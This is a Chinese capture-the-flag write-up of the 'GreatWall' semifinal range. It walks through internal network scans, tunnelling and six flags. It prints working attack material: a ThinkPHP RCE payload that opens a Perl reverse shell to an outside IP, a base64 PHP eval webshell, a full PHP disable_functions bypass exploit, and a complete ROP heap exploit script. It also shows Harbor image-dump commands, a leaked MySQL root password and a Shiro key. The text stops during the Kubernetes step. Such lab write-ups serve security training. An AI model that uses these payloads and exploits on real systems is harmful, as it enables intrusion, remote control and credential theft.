长城杯半决赛-GreatWall
长城杯半决赛-GreatWall
攻击路径
图片摘自先知社区-iker
首先使用fscan对内网进行扫描
┌──(root㉿kali-plus)-[~/fscan/Linux]
└─# ./fscan -h 8.130.146.145
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 8.130.146.145:80
[+] 端口开放 8.130.146.145:22
[+] 端口开放 8.130.146.145:8080
[+] 存活端口数量: 3
[*] 开始漏洞扫描...
[*] 网站标题 http://8.130.146.145 状态码:200 长度:10887 标题:""
[*] 网站标题 http://8.130.146.145:8080 状态码:200 长度:1027 标题:Login Form
[+] [发现漏洞] 目标: http://8.130.146.145:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息: %!s(<nil>)
[!] 扫描错误 8.130.146.145:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 3/3
[*] 扫描结束,耗时: 11.206446111s
Thinkphp50223-Rce(flag01)
发现thinkphp5023的rce漏洞,去找现成的poc利用一下
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=perl -MIO -e '$p=fork;exit;if($p);$c=new IO::Socket::INET(PeerAddr,"156.238.233.21:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
但是没利用成功,直接上一把梭工具,拿到shell之后就能拿到flag01了
cat /f1ag01_UdEv.txt
flag01: flag{176f49b6-147f-4557-99ec-ba0a351e1ada}
拿到这个shell之后,上传一个fscan,获取ip,并使用fscan进行扫描
(www-data:/var/www/html/background/public) $ ./fscan -h 172.28.23.1/24 >result
(www-data:/var/www/html/background/public) $ cat result
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 172.28.23.0-172.28.23.255
[*] 已生成IP范围: 172.28.23.0 - 172.28.23.255
[*] 已解析CIDR 172.28.23.1/24 -> IP范围 172.28.23.0-172.28.23.255
[*] 最终有效主机数量: 256
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 172.28.23.26 存活 (ICMP)
[+] 目标 172.28.23.17 存活 (ICMP)
[+] 目标 172.28.23.33 存活 (ICMP)
[+] ICMP存活主机数量: 3
[*] 共解析 218 个有效端口
[+] 端口开放 172.28.23.26:80
[+] 端口开放 172.28.23.33:22
[+] 端口开放 172.28.23.17:80
[+] 端口开放 172.28.23.26:22
[+] 端口开放 172.28.23.26:21
[+] 端口开放 172.28.23.33:8080
[+] 端口开放 172.28.23.17:8080
[+] 端口开放 172.28.23.17:22
[+] 存活端口数量: 8
[*] 开始漏洞扫描...
[*] 网站标题 http://172.28.23.33:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.28.23.33:8080/login;jsessionid=86D0E86A3F4AA49110E9F47446D39E0F
[*] 网站标题 http://172.28.23.17 状态码:200 长度:10887 标题:""
[*] 网站标题 http://172.28.23.26 状态码:200 长度:13693 标题:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[*] 网站标题 http://172.28.23.33:8080/login;jsessionid=86D0E86A3F4AA49110E9F47446D39E0F 状态码:200 长度:3860 标题:智联科技 ERP 后台登陆
[*] 网站标题 http://172.28.23.17:8080 状态码:200 长度:1027 标题:Login Form
[+] ftp 172.28.23.26:21:anonymous
[->]OASystem.zip
[+] [发现漏洞] 目标: http://172.28.23.17:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://172.28.23.33:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://172.28.23.33:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息: %!s(<nil>)
[!] 扫描错误 172.28.23.17:22 - 扫描总时间超时: context deadline exceeded
[!] 扫描错误 172.28.23.33:22 - 扫描总时间超时: context deadline exceeded
[!] 扫描错误 172.28.23.26:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 8/8
[*] 扫描结束,耗时: 12.11975967s
扫描到了一个新翔oa的管理系统和一个erp后台管理系统,下面要设置代理
设置代理
使用stowaway
#vps
./linux_x64_admin -l 6666
#靶机
./linux_x64_agent -c <ip>:<port>
#vps
use 0
socks 15000
然后使用Proxifier或者proxychains4连上去就行
ftp匿名登录 审计源码 文件上传(flag02)
使用ftp匿名登录进去之后发现一个OASystem的源码,下载下来进行代码审计发现漏洞并利用imgbase64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOyBAZXZhbCgkX1BPU1RbJ3NoZWxsJ10pOyA/Pg==
然后就拿到这台机子的shell了,但是有disable_functions,需要绕过,可以使用插件但是插件不好用
找到ta0神写的wp,里面有一个脚本https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php
<?php
# PHP 7.0-8.0 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=54350
#
# This exploit should work on all PHP 7.0-8.0 versions
# released as of 2021-10-06
#
# Author: https://github.com/mm0r1
pwn('chmod +x linux_x64_agent;./linux_x64_agent -c 172.28.23.17:9999');
function pwn($cmd) {
define('LOGGING', false);
define('CHUNK_DATA_SIZE', 0x60);
define('CHUNK_SIZE', ZEND_DEBUG_BUILD ? CHUNK_DATA_SIZE + 0x20 : CHUNK_DATA_SIZE);
define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50);
define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1);
define('CMD', $cmd);
for($i = 0; $i < 10; $i++) {
$groom[] = Pwn::alloc(STRING_SIZE);
}
stream_filter_register('pwn_filter', 'Pwn');
$fd = fopen('php://memory', 'w');
stream_filter_append($fd,'pwn_filter');
fwrite($fd, 'x');
}
class Helper { public $a, $b, $c; }
class Pwn extends php_user_filter {
private $abc, $abc_addr;
private $helper, $helper_addr, $helper_off;
private $uafp, $hfp;
public function filter($in, $out, &$consumed, $closing) {
if($closing) return;
stream_bucket_make_writeable($in);
$this->filtername = Pwn::alloc(STRING_SIZE);
fclose($this->stream);
$this->go();
return PSFS_PASS_ON;
}
private function go() {
$this->abc = &$this->filtername;
$this->make_uaf_obj();
$this->helper = new Helper;
$this->helper->b = function($x) {};
$this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2;
$this->log("helper @ 0x%x", $this->helper_addr);
$this->abc_addr = $this->helper_addr - CHUNK_SIZE;
$this->log("abc @ 0x%x", $this->abc_addr);
$this->helper_off = $this->helper_addr - $this->abc_addr - 0x18;
$helper_handlers = $this->str2ptr(CHUNK_SIZE);
$this->log("helper handlers @ 0x%x", $helper_handlers);
$this->prepare_leaker();
$binary_leak = $this->read($helper_handlers + 8);
$this->log("binary leak @ 0x%x", $binary_leak);
$this->prepare_cleanup($binary_leak);
$closure_addr = $this->str2ptr($this->helper_off + 0x38);
$this->log("real closure @ 0x%x", $closure_addr);
$closure_ce = $this->read($closure_addr + 0x10);
$this->log("closure class_entry @ 0x%x", $closure_ce);
$basic_funcs = $this->get_basic_funcs($closure_ce);
$this->log("basic_functions @ 0x%x", $basic_funcs);
$zif_system = $this->get_system($basic_funcs);
$this->log("zif_system @ 0x%x", $zif_system);
$fake_closure_off = $this->helper_off + CHUNK_SIZE * 2;
for($i = 0; $i < 0x138; $i += 8) {
$this->write($fake_closure_off + $i, $this->read($closure_addr + $i));
}
$this->write($fake_closure_off + 0x38, 1, 4);
$handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
$this->write($fake_closure_off + $handler_offset, $zif_system);
$fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off;
$this->write($this->helper_off + 0x38, $fake_closure_addr);
$this->log("fake closure @ 0x%x", $fake_closure_addr);
$this->cleanup();
($this->helper->b)(CMD);
}
private function make_uaf_obj() {
$this->uafp = fopen('php://memory', 'w');
fwrite($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE));
for($i = 0; $i < STRING_SIZE; $i++) {
fwrite($this->uafp, "\x00");
}
}
private function prepare_leaker() {
$str_off = $this->helper_off + CHUNK_SIZE + 8;
$this->write($str_off, 2);
$this->write($str_off + 0x10, 6);
$val_off = $this->helper_off + 0x48;
$this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8);
$this->write($val_off + 8, 0xA);
}
private function prepare_cleanup($binary_leak) {
$ret_gadget = $binary_leak;
do {
--$ret_gadget;
} while($this->read($ret_gadget, 1) !== 0xC3);
$this->log("ret gadget = 0x%x", $ret_gadget);
$this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60));
$this->write(8, $ret_gadget);
}
private function read($addr, $n = 8) {
$this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10);
$value = strlen($this->helper->c);
if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
return $value;
}
private function write($p, $v, $n = 8) {
for($i = 0; $i < $n; $i++) {
$this->abc[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
private function get_basic_funcs($addr) {
while(true) {
// In rare instances the standard module might lie after the addr we're starting
// the search from. This will result in a SIGSGV when the search reaches an unmapped page.
// In that case, changing the direction of the search should fix the crash.
// $addr += 0x10;
$addr -= 0x10;
if($this->read($addr, 4) === 0xA8 &&
in_array($this->read($addr + 4, 4),
[20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) {
$module_name_addr = $this->read($addr + 0x20);
$module_name = $this->read($module_name_addr);
if($module_name === 0x647261646e617473) {
$this->log("standard module @ 0x%x", $addr);
return $this->read($addr + 0x28);
}
}
}
}
private function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = $this->read($addr);
$f_name = $this->read($f_entry, 6);
if($f_name === 0x6d6574737973) {
return $this->read($addr + 8);
}
$addr += 0x20;
} while($f_entry !== 0);
}
private function cleanup() {
$this->hfp = fopen('php://memory', 'w');
fwrite($this->hfp, pack('QQ', 0, $this->abc_addr));
for($i = 0; $i < FILTER_SIZE - 0x10; $i++) {
fwrite($this->hfp, "\x00");
}
}
private function str2ptr($p = 0, $n = 8) {
$address = 0;
for($j = $n - 1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($this->abc[$p + $j]);
}
return $address;
}
private function ptr2str($ptr, $n = 8) {
$out = '';
for ($i = 0; $i < $n; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
private function log($format, $val = '') {
if(LOGGING) {
printf("{$format}\n", $val);
}
}
static function alloc($size) {
return str_shuffle(str_repeat('A', $size));
}
}
?>
内网二级代理
使用之前开好的stowaway
[[Kn1ght/images/87b50cf06b815a7c3d95eadb4e730018_MD5.jpeg|Open: Pasted image 20250410213849.png]]
使用上面的脚本,修改对应的端口号,然后访问这个文件就能执行,然后就能监听到了,接着返回使用这个刚刚监听到的,再开一个代理
back
use 1
socks 15001
想要拿到shell直接输入shell就能拿到shell了,flag02.txt在根目录,但是没有权限
find / -perm -4000 2>/dev/null
/bin/fusermount
/bin/ping6
/bin/mount
/bin/su
/bin/ping
/bin/umount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/staprun
/usr/bin/base32
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/s-nail/s-nail-privsep
base32 flag02.txt | base32 -d
flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}
flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}
上传fscan再扫一下,得到结果如下:
[2025-04-10 21:35:02] [INFO] 生成IP范围: 172.22.14.0.%!d(string=172.22.14.255) - %!s(MISSING).%!d(MISSING)
[2025-04-10 21:35:02] [INFO] 解析CIDR 172.22.14.0/24 -> IP范围 172.22.14.0-172.22.14.255
[2025-04-10 21:35:02] [INFO] 最终有效主机数量: 256
[2025-04-10 21:35:02] [INFO] 开始主机扫描
[2025-04-10 21:35:02] [INFO] 正在尝试无监听ICMP探测...
[2025-04-10 21:35:02] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-04-10 21:35:02] [INFO] 切换为PING方式探测...
[2025-04-10 21:35:02] [SUCCESS] 目标 172.22.14.6 存活 (ICMP)
[2025-04-10 21:35:02] [SUCCESS] 目标 172.22.14.37 存活 (ICMP)
[2025-04-10 21:35:02] [SUCCESS] 目标 172.22.14.46 存活 (ICMP)
[2025-04-10 21:35:08] [INFO] 存活主机数量: 3
[2025-04-10 21:35:08] [INFO] 有效端口数量: 233
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.6:21
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.46:80
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.46:22
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.37:22
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.6:80
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.6:22
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.37:2379
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.37:10250
[2025-04-10 21:35:08] [SUCCESS] 服务识别 172.22.14.6:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-04-10 21:35:08] [SUCCESS] 服务识别 172.22.14.46:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.11 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11.]
[2025-04-10 21:35:08] [SUCCESS] 服务识别 172.22.14.37:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-04-10 21:35:08] [SUCCESS] 服务识别 172.22.14.6:22 => [ssh] 版本:7.2p2 Ubuntu 4ubuntu2.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10.]
[2025-04-10 21:35:13] [SUCCESS] 服务识别 172.22.14.46:80 => [http] 产品:nginx
[2025-04-10 21:35:14] [SUCCESS] 服务识别 172.22.14.37:2379 =>
[2025-04-10 21:35:14] [SUCCESS] 服务识别 172.22.14.6:80 => [http]
[2025-04-10 21:35:18] [SUCCESS] 服务识别 172.22.14.37:10250 =>
[2025-04-10 21:35:19] [INFO] 存活端口数量: 8
[2025-04-10 21:35:19] [INFO] 开始漏洞扫描
[2025-04-10 21:35:19] [INFO] 加载的插件: ftp, ssh, webpoc, webtitle
[2025-04-10 21:35:19] [SUCCESS] 网站标题 http://172.22.14.6 状态码:200 长度:13693 标题:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413[2025-04-10 21:35:19] [SUCCESS] 网站标题 http://172.22.14.46 状态码:200 长度:785 标题:Harbor
[2025-04-10 21:35:19] [SUCCESS] 发现指纹 目标: http://172.22.14.46 指纹: [Harbor]
[2025-04-10 21:35:19] [SUCCESS] 匿名登录成功!
[2025-04-10 21:35:19] [SUCCESS] 网站标题 https://172.22.14.37:10250 状态码:404 长度:19 标题:无标题
[2025-04-10 21:35:20] [SUCCESS] 检测到漏洞 http://172.22.14.46:80/swagger.json poc-yaml-swagger-ui-unauth 参数:[{path swagger.json}]
Harbor-CVE-2022-46463(flag05)
不用设置刚刚搭建的二级代理,好像是直接链上去的,还是使用第一个设置的代理,可以直接访问172.22.14.46 访问之后打CVE-2022-46463 直接找poc:CVE-2022-46463
proxychains4 -q python harbor.py http://172.22.14.46/
proxychains4 -q python harbor.py http://172.22.14.46 --dump harbor/secret --v2
grep -r 'flag05'
┌──(root㉿kali-plus)-[~/gratewall]
└─# proxychains4 -q python harbor.py http://172.22.14.46/
[*] API version used v2.0
[+] project/projectadmin
[+] project/portal
[+] library/nginx
[+] library/redis
[+] harbor/secret
┌──(root㉿kali-plus)-[~/gratewall]
└─# proxychains4 -q python harbor.py http://172.22.14.46 --dump harbor/secret --v2 [+] Dumping : harbor/secret:latest
[+] Downloading:58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50
[+] Downloading:b51569e7c50720acf6860327847fe342a1afbe148d24c529fb81df105e3eed01
[+] Downloading:da8ef40b9ecabc2679fe2419957220c0272a965c5cf7e0269fa1aeeb8c56f2e1
[+] Downloading:fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e
[+] Downloading:413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49
[+] Downloading:8bd8c9755cbf83773a6a54eff25db438debc22d593699038341b939e73974653
┌──(root㉿kali-plus)-[~/gratewall]
└─# grep -r 'flag05'
caches/harbor_secret/latest/413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49/f1ag05_Yz1o.txt:flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}
得到flag05 flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}
UDF提权(flag06)
然后去下载另一个镜像
┌──(root㉿kali-plus)-[~/gratewall]
└─# proxychains4 python3 harbor.py http://172.22.14.46 --dump project/projectadmin --v2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[+] Dumping : project/projectadmin:latest
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[+] Downloading : 63e9bbe323274e77e58d77c6ab6802d247458f784222fbb07a2556d6ec74ee05
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[+] Downloading : a1ae0db7d6c6f577c8208ce5b780ad362ef36e69d068616ce9188ac1cc2f80c6
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[+] Downloading : 70437571d98143a3479eaf3cc5af696ea79710e815d16e561852cf7d429736bd
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[+] Downloading : ae0fa683fb6d89fd06e238876769e2c7897d86d7546a4877a2a4d2929ed56f2c
然后就能拿到一个叫ProjectAdmin-0.0.1-SNAPSHOT.jar的jar包
spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml
泄露了mysql密码,可以直接去连或者使用MDUT工具
[[Kn1ght/images/1458b53735d37664a67e2f067f56af6e_MD5.jpeg|Open: Pasted image 20250416200509.png]]
得到flag06:flag06: flag{413ac6ad-1d50-47cb-9cf3-17354b751741}
这里有个坑,使用onefox工具箱里的MDUT增强版连不上,使用原版就能连上,也可以使用msf进行udf提权参考ta0的博客
shiro+pwn(flag03)
http://172.28.23.33:8080bash/actuator/heapdump 存在heapdump内存泄漏
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES
得到shirokey直接找工具利用,检测利用链然后直接上传内存,设置号代理直接连
/ >ss -lntp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 64 0.0.0.0:59696 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 100 *:8080 *:* users:(("java",pid=666,fd=27))
看到有一个59696端口,设置好代理连接上去看看,是一个pwn,看的不太懂,直接上exp,对应的elf在/home/ops01/HashNote
from pwn import *
context.arch='amd64'
def add(key,data='b'):
p.sendlineafter(b'Option:',b'1')
p.sendlineafter(b'Key:',key)
p.sendlineafter(b'Data:',data)
def show(key):
p.sendlineafter(b'Option:',b'2')
p.sendlineafter(b"Key: ",key);
def edit(key,data):
p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',key)
p.sendlineafter(b'Data:',data)
def name(username):
p.sendlineafter(b'Option:',b'4')
p.sendlineafter(b'name:',username)
p = remote('172.28.23.33', 59696)
# p = process('./HashNote')
username=0x5dc980
stack=0x5e4fa8
ukey=b'\x30'*5+b'\x31'+b'\x44'
fake_chunk=flat({
0:username+0x10,
0x10:[username+0x20,len(ukey),\
ukey,0],
0x30:[stack,0x10]
},filler=b'\x00')
p.sendlineafter(b'name',fake_chunk)
p.sendlineafter(b'word','freep@ssw0rd:3')
add(b'\x30'*1+b'\x31'+b'\x44',b'test') # 126
add(b'\x30'*2+b'\x31'+b'\x44',b'test') # 127
show(ukey)
main_ret=u64(p.read(8))-0x1e0
rdi=0x0000000000405e7c # pop rdi ; ret
rsi=0x000000000040974f # pop rsi ; ret
rdx=0x000000000053514b # pop rdx ; pop rbx ; ret
rax=0x00000000004206ba # pop rax ; ret
syscall=0x00000000004560c6 # syscall
fake_chunk=flat({
0:username+0x20,
0x20:[username+0x30,len(ukey),\
ukey,0],
0x40:[main_ret,0x100,b'/bin/sh\x00']
},filler=b'\x00')
name(fake_chunk.ljust(0x80,b'\x00'))
payload=flat([
rdi,username+0x50,
rsi,0,
rdx,0,0,
rax,0x3b,
syscall
])
p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',ukey)
p.sendline(payload)
p.sendlineafter(b'Option:',b'9')
p.interactive()
然后拿到flag03
$ cat f1ag03.txt
flag03: flag{6a326f94-6526-4586-8233-152d137281fd}
K8S(flag04)
然后去看172.22.14.37这台机子,发现k8s未授权
┌──(root㉿kali-plus)-[~]
└─# proxychains4 curl https://172.22.14.37:6443/ -k
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.37:6443 ... OK
{
"paths": [
"/api",
"/api/v1",
"/apis",
"/apis/",
"/apis/admissionregistration.k8s.io",
"/apis/admissionregistration.k8s.io/v1",
"/apis/admissionregistration.k8s.io/v1beta1",
"/apis/apiextensions.k8s.io",
"/apis/apiextensions.k8s.io/v1",
"/apis/apiextensions.k8s.io/v1beta1",
"/apis/apiregistration.k8s.io",
"/apis/apiregistration.k8s.io/v1",
"/apis/apiregistration.k8s.io/v1beta1",
"/apis/apps",
"/apis/apps/v1",
"/apis/authentication.k8s.io",
"/apis/authentication.k8s.io/v1",
"/apis/authentication.k8s.io/v1beta1",
"/apis/authorization.k8s.io",
"/apis/authorization.k8s.io/v1",
"/apis/authorization.k8s.io/v1beta1",
"/apis/autoscaling",
"/apis/autoscaling/v1",
"/apis/autoscaling/v2beta1",
"/apis/autoscaling/v2beta2",
"/apis/batch",
"/apis/batch/v1",
"/apis/batch/v1beta1",
"/apis/certificates.k8s.io",
"/apis/certificates.k8s.io/v1beta1",
"/apis/coordination.k8s.io",
"/apis/coordination.k8s.io/v1",
"/apis/coordination.k8s.io/v1beta1",
"/apis/events.k8s.io",
"/apis/events.k8s.io/v1beta1",
"/apis/extensions",
"/apis/extensions/v1beta1",
"/apis/networking.k8s.io",
"/apis/networking.k8s.io/v1",
"/apis/networking.k8s.io/v1beta1",
"/apis/node.k8s.io",
"/apis/node.k8s.io/v1beta1",
"/apis/policy",
"/apis/policy/v1beta1",
"/apis/rbac.authorization.k8s.io",
"/apis/rbac.authorization.k8s.io/v1",
"/apis/rbac.authorization.k8s.io/v1beta1",
"/apis/scheduling.k8s.io",
"/apis/scheduling.k8s.io/v1",
"/apis/scheduling.k8s.io/v1beta1",
"/apis/storage.k8s.io",
"/apis/storage.k8s.io/v1",
"/apis/storage.k8s.io/v1beta1",
"/healthz",
"/healthz/autoregister-completion",
"/healthz/etcd",
"/healthz/log",
"/healthz/ping",
"/healthz/poststarthook/apiservice-openapi-controller",
"/healthz/poststarthook/apiservice-registration-controller",
"/healthz/poststarthook/apiservice-status-available-controller",
"/healthz/poststarthook/bootstrap-controller",
"/healthz/poststarthook/ca-registration",
"/healthz/poststarthook/crd-informer-synced",
"/healthz/poststarthook/generic-apiserver-start-informers",
"/healthz/poststarthook/kube-apiserver-autoregistration",
"/healthz/poststarthook/rbac/bootstrap-roles",
"/healthz/poststarthook/scheduling/bootstrap-system-priority-classes",
"/healthz/poststarthook/start-apiextensions-controllers",
"/healthz/poststarthook/start-apiextensions-informers",
"/healthz/poststarthook/start-kube-aggregator-informers",
"/healthz/poststarthook/start-kube-apiserver-admission-initializer",
"/livez",
"/livez/autoregister-completion",
"/livez/etcd",
"/livez/log",
"/livez/ping",
"/livez/poststarthook/apiservice-openapi-controller",
"/livez/poststarthook/apiservice-registration-controller",
"/livez/poststarthook/apiservice-status-available-controller",
"/livez/poststarthook/bootstrap-controller",
"/livez/poststarthook/ca-registration",
"/livez/poststarthook/crd-informer-synced",
"/livez/poststarthook/generic-apiserver-start-informers",
"/livez/poststarthook/kube-apiserver-autoregistration",
"/livez/poststarthook/rbac/bootstrap-roles",
"/livez/poststarthook/scheduling/bootstrap-system-priority-classes",
"/livez/poststarthook/start-apiextensions-controllers",
"/livez/poststarthook/start-apiextensions-informers",
"/livez/poststarthook/start-kube-aggregator-informers",
"/livez/poststarthook/start-kube-apiserver-admission-initializer",
"/logs",
"/metrics",
"/openapi/v2",
"/readyz",
"/readyz/autoregister-completion",
"/readyz/etcd",
"/readyz/log",
"/readyz/ping",
"/readyz/poststarthook/apiservice-openapi-controller",
"/readyz/poststarthook/apiservice-registration-controller",
"/readyz/poststarthook/apiservice-status-available-controller",
"/readyz/poststarthook/bootstrap-controller",
"/readyz/poststarthook/ca-registration",
"/readyz/poststarthook/crd-informer-synced",
"/readyz/poststarthook/generic-apiserver-start-informers",
"/readyz/poststarthook/kube-apiserver-autoregistration",
"/readyz/poststarthook/rbac/bootstrap-roles",
"/readyz/poststarthook/scheduling/bootstrap-system-priority-classes",
"/readyz/poststarthook/start-apiextensions-controllers",
"/readyz/poststarthook/start-apiextensions-informers",
"/readyz/poststarthook/start-kube-aggregator-informers",
"/readyz/poststarthook/start-kube-apiserver-admission-initializer",
"/readyz/shutdown",
"/version"
]
